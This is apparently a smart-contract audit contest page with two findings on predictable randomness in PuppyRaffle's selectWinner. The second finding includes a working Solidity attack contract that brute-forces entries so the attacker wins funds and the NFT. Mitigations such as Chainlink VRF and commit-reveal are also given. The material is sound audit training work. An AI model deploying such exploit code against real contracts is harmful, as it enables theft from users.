Winner selection can be influenced
Winner selection can be influenced
PuppyRaffle::selectWinner calculates the winner index using predictable or influenceable elements to obtain a rare puppy.
Description
-
The
selectWinner()function should select the winner and NFT rarity fairly, unpredictably, and non-manipulably, regardless of who executes the function. -
The calculation of the winner and NFT rarity depends on controllable or partially manipulable values such as
msg.sender,block.timestamp, andblock.difficulty. Additionally, the function can be executed by any address, allowing an attacker to choose the optimal timing and caller to influence the result. -
Explain the specific issue or problem in one or more sentences
Risk
Likelihood: High
-
The attack is viable every time the raffle ends, since any user can call
selectWinner(). -
An attacker can front-run the transaction or use bots/MEV to become the msg.sender for the calculation.
-
Block producers can bias the result by adjusting transaction ordering or the timestamp.
Impact: High
-
Winner selection is neither fair nor random.
-
Manipulation of NFT rarity, gaining economic advantages.
-
Loss of trust in the protocol and possible financial impact for users.
Proof of Concept
The attacker waits for the raffle to end.
Calculates off-chain multiple possible results by varying the caller.
Calls selectWinner() at the moment that gives a favorable winnerIndex
or high rarity.If another user tries to call the function, the attacker can front-run.
Result: manipulated probability of winning the raffle or obtaining rare NFTs.
Recommended Mitigation
Use a secure randomness system (Chainlink VRF).
Alternatively, implement a commit–reveal scheme.
Never include msg.sender or block.timestamp as sources of randomness.
Lead Judging Commences
[H-03] Randomness can be gamed
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.